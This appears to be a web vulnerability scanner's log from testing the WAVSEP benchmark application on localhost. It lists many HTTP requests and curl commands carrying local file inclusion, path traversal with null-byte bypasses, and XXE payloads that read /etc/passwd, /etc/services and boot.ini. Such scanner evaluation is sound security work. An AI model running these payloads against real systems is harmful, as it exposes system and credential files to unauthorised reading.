GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

